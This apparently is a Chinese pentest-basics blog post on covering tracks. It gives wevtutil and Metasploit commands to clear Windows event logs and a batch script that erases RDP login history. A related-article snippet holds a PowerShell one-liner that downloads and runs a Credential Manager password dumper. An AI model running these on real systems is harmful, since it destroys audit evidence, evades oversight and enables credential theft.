【基础篇】————29、痕迹清理

最新推荐文章于 2024-04-29 16:57:01 发布
最新推荐文章于 2024-04-29 16:57:01 发布
阅读量430 收藏 3
点赞数

Windows日志清除

获取日志分类列表:

wevtutil el >1.txt

获取单个日志类别的统计信息:

wevtutil gli "windows powershell"

回显:

creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1

查看指定日志的具体内容:

wevtutil qe /f:text "windows powershell"

删除单个日志类别的所有信息:

wevtutil cl "windows powershell"

破坏Windows日志记录功能

利用工具

msf

run clearlogs 

clearev

3389登陆记录清除

@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit
FLy_鹏程万里
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全从入门到精通(特别I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 153
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
Python 0基础开发游戏:打地鼠(详细教程)VS code版本
qq_42022255的博客
11-30 2736
目录准备工作创建项目可选操作游戏开发的思路游戏开发的技术点打地鼠游戏绘制地鼠颜色和位置绘制圆形随机出现隔n帧刷新增加交互点击距离测量记录分数鼠标指针变锤子限定每局时间中文字体显示背景图片使用动态图片让游戏重新开始添加音效发布软件添加音效 如果你没有任何编程经验,而且想尝试一下学习编程开发,这个系列教程一定适合你,它将带你学习最基本的Python语法,并让你掌握小游戏的开发技巧。你所需要的,就是付...
内网渗透结束,痕迹清理必备手段
Appleteachers的博客
04-14 820
痕迹清理 在我们做完一系列的内网渗透操作后,必然会留下一些蛛丝马迹,因此我们需要给自己”擦屁股“。本只介绍如何清除系统日志、修改文件时间戳。 痕迹清理 Powershell 修改文件时间戳 有时候我们在登陆目标桌面后,根据需求可能会动用目标主机上的文件或者文件夹,而一些管理员很久都不会登陆一次主机;设想当管理员一上线看到自己的文件夹日期有异常,是否会怀疑? Function edit_time(KaTeX parse error: Expected '}', got 'EOF' at end of inp
渗透测试入门10之痕迹清理
鹿鸣天涯
04-03 2139
渗透测试入门10之痕迹清理 Windows日志清除 获取日志分类列表: wevtutil el >1.txt 获取单个日志类别的统计信息: eg. wevtutil gli "windows powershell" 回显: creationTime: 2016-11-28T06:01:37.986Z lastAccessTime: 2016-11-28T06:01:37.98...
渗透测试之痕迹清除
qq_29864185的博客
07-01 3410
痕迹清除 当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的! 我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。 最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透后痕迹清除。 Windows系统
渗透测试——痕迹清除
zjdda的博客
07-11 1884
当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
Kali Linux渗透测试 049 清除痕迹
kevinhanser
03-04 4981
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 1. 清除渗透攻击痕迹
网络安全——社会工程学02
m0_63715896的博客
12-29 2124
◆社会工程学:如果目标网络没有直接的入口,欺骗的艺术将起到抛砖引玉的重要作用。对目标组织中的人员进行定向攻击,很有可能帮助我们找到渗透目标系统的入口。例如:诱使用户运行会安装后门的恶意程序。社会工程学渗透分为多种不同形式,伪装成网络管理员,通过电话要求用户提供给自己的账户信息,发送钓鱼邮件来劫持用户的银行账户,甚至是诱使某人出现在某个地点。 ▶社会工程学是利用人性弱点体察、获取有价值信息的实践方法,它是一种欺骗的艺术。在缺 少目标系统的必要信息时,社会工程学技术是渗透测试人员获取信息的至关重要的手段。对 所
EricChu的雅思之路——2020雅思A类考试切身体会\自学备考建议\考试完整流程(最详细版请耐心阅读)
qq_40625251的博客
08-30 2946
笔者于2020年8月8日参加了雅思学术类纸笔考试。这对我自己来说是空前绝后的,因为在考试前我完全不了解雅思,并且因为准备雅思考试是一个漫长而具有挑战性的过程,我不打算再考了,够用就行: 听力 阅读 写作 口语 总分 7.5 6.5 6.0 6.0 6.5 对于出国来说,这个成绩满足了我选择的国家90%的大学要求。虽说考到这个成绩不值一提,但我还是想以此文做一个阶段性总结,顺便给正准备加入考鸭队伍的你一点实用的建议。 Index一、雅思是什么?1、考试内容?2、雅思考试的==杀手锏==:(
渗透测试基础笔记1
weixin_43750381的博客
11-20 1274
第一天第一课科普渗透测试流程渗透测试与入侵的最大区别:渗透测试流程流程图测试环境安装配置虚拟机 科普 黑客: “黑客”一词是由英语**Hacker**音译出来的。他们伴随着计算机和网络的发展而产生和成长。 黑客传奇 理查德 马修 斯托曼 传统型大黑客,斯托曼在1971年受聘成为美国麻省理工学院人工智能实验室程序员 史蒂夫 沃兹尼亚克 苹果计算机创办人之一,现就职小学教师。 林纳斯 托瓦...
Invoke-WCMDump结合powershell进行密码获取
03-26
Ivoke-WCMDump 什么是Credential Manager Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作,系统会自动填入凭据,实现自动登录,凭据保存在特定的位置,被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault) 从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"
上网痕迹清除
01-30
百分百完美清除 上网痕迹。备查 妥妥滴。这么说吧,以前俺们老查老查外网机使用痕迹,干脆自己做了个软件。
内网渗透系列:痕迹清理方法小结
闵行小鱼塘
08-05 3690
本文学习并小结下痕迹清理方法
后渗透删除日志
haha1314的博客
05-15 421
删除日志 del c:\winnt\system32\logfiles*.* del c:\winnt\ssytem32\config*.evt del c:\winnt\system32\dtclog*.* del c:\winnt\system32*.log del c:\winnt\system32*.txt del c:\winnt*.txt del c:\winnt*.log ...
渗透后消除痕迹的方法及实例讲解
白帽子佳奇的博客
12-07 2286
在网络安全领域,渗透后消除痕迹是一个关键的环节。作为一名专业的网络安全从业者,我认识到在成功完成渗透测试后,有效地清除所有痕迹的重要性。很多新手,渗透了忘记擦屁股,最后暴露,如果你刚接触网安,欢迎探讨。
痕迹清除
weixin_43873557的博客
02-10 672
在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录,执行命令等。攻击者通常会对Windows日志进行清除和绕过。 windows痕迹清除 如何查看: 事件查看器 -> windows日志 win+r eventvwr.msc 保存路径: C:\Windows\System32\winevt\Logs\ 包括五个类别:应用程序、安全、Setup、系统、转发事件 powershell -c “Get-WinEvent -FilterHashtable @{lognam
浅谈在渗透测试中如何清理痕迹-网络安全(黑客)自学
最新发布
MachineGunJoe666
04-29 224
在渗透测试中,清除痕迹可以很好的保护自己。在Linux系统中,如何有效的清除使用痕迹呢?不妨看看这文章吧!
#渗透入侵后日志痕迹清理
weixin_30814223的博客
12-27 707
一:开始 – 程序 – 管理工具 – 计算机管理 – 系统工具 -事件查看器,然后清除日志。二: Windows2000的日志文件通常有应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等。日志文件默认位置:应用程序日志、安全日志、系统日志、DNS日志默认位置:%sys temroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全...
linux渗透后清除日志,后渗透阶段清理痕迹方式总结
weixin_42515302的博客
05-05 1699
一、概述:在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹的方式做一个总结。二、windows有远程桌面权限时手动删除日志:开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志wevtutil工具命令行清除:wevtutil el 列出系统中所有日志名称wevtutil cl system...
Spark性能优化基础:开发与资源调优
"Spark性能优化指南——基础"深入探讨了在大数据计算领域广泛应用的Spark平台,其强大的功能使其在离线批处理、SQL查询、实时流处理、机器学习和图计算等方面表现出色。在美团和大众点评等企业,Spark因其快速执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值